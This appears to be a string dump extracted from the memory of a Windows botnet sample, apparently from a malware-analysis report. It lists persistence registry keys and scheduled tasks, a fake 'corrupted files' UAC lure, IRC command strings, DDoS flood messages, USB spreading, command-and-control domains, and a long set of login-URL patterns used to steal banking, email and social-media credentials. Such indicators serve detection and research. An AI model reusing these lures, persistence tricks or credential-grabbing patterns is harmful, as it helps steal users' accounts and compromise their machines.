mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre>svchost.exe_884_rwx_00170000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>svchost.exe_884_rwx_00A10000_00029000:<pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</